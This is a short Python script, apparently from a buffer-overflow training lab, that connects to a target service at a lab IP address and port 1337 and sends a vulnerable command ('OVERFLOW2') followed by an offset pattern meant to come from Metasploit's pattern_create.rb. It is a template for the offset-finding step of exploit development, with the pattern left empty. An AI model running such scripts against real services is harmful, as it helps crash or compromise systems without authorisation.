#!/usr/bin/env python3
import sys, socket

offset = "" # This would be generated by the pattern_create.rb module
address = '10.10.211.46' #CHANGE THIS
port = 1337 # CHANGE THIS
vulncommand = 'OVERFLOW2 ' # CHANGE THIS, the vulnerable command that was found in the spiking section would go here

try:
        s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
        s.connect((address,port))

        s.send(bytes(vulncommand + offset, "latin-1"))
        s.close()

except:
        print("Error connecting to the server")
        sys.exit()
